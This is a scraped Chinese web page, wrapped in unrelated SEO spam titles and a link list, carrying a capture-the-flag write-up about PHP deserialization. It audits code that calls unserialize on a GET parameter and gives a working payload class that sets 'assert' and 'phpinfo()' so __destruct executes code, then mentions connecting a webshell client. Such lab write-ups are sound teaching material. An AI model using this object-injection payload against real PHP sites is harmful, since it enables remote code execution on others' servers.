当前位置: 首页 > news >正文

建什么网站 做 cpa广州企业网站建设哪家好

建什么网站 做 cpa,广州企业网站建设哪家好,漂亮的网站设计,学校网站织梦源码打开题目 直接查看源代码 打开源代码发现了个./time.php?source 访问一下 审计代码: 现存在反序列化语句:$ppp unserialize($_GET["data"]);和执行漏洞:echo $b($a); 发现在__destruct()方法里面有 echo $b($a); 这个是php的…

打开题目

直接查看源代码

 打开源代码发现了个./time.php?source

访问一下

审计代码:

现存在反序列化语句:@$ppp = unserialize($_GET["data"]);和执行漏洞:echo $b($a);

发现在__destruct()方法里面有 echo $b($a);

这个是php的特性,php可以通过这种方法动态调用方法。

思路很简单,只要把$b赋值为方法名字,吧$a赋值成调用的参数就行了。

payload

<?php
#error_reporting(0);
class HelloPhp
{public $a;public $b;public function __construct(){$this->a = "phpinfo()";$this->b = "assert";}public function __destruct(){$a = $this->a;$b = $this->b;echo $b($a);}
}
$c = new HelloPhp;@$ppp = serialize($c);
echo $ppp;
?>

将得到的payload上传

发现成功了,于是可以用蚁剑连接,但是这个题目用蚁剑连接以后是空白一片,于是考虑可能是在phpinfo()里面

得到flag

http://www.yayakq.cn/news/111084/

相关文章:

  • 做蛋糕的英文网站wordpress 经过天数
  • 做临床研究在哪个网站注册受欢迎的佛山网站制作
  • 鄂州网站建设设计科技狂人
  • 宁波网站制作怎样360推广登陆入口
  • 企业网站的建立费用重庆发布的最新消息今天
  • 四川做网站的公司有哪些河南省建设集团有限公司官网
  • 有没有卖设计的网站网站项目开发案
  • 能建设铁塔的公司网站wordpress 中文字体插件
  • 武威市凉州区建设局网站建设网站服务器自营方式的特点
  • 不用服务器做视频网站手机淘宝网页
  • 网站目录命名盐城市网站
  • 浙江建设局图审网站中关村网站建设公司
  • 群团组织网站建设中山网站建设哪家强
  • 江西做网站的公司绍兴市交通建设有限公司网站
  • 祁东网站设计公司网站开发程序员工资
  • 免费自助建站哪个好环保网站建设多少钱
  • 满城住房和城乡建设局网站国家高新技术企业认定有什么用
  • 传动设备 技术支持 东莞网站建设无锡网站建设收费
  • 浙江龙元建设集团 网站全网营销实战培训
  • 好的国外设计网站推荐企业外部网站建设
  • 北滘网站建设微网站和网站的区别
  • 成都网站备案查询一个人免费观看视频播放
  • 昆山苏州网站建设设计与绘制一个网站首页
  • 关于手表网站建设策划书有哪个网站可以做链接
  • 网站上传在空间哪里网站开发都需要学什么
  • 炒股网站怎么做企业网站制作的市场
  • mvc中手把手做网站企业网盘价格
  • 贵州营销型网站8一9岁的手工
  • 网站导航的展开与收缩怎么做的常见行业门户网站
  • 腾云网站建设球队世界排名榜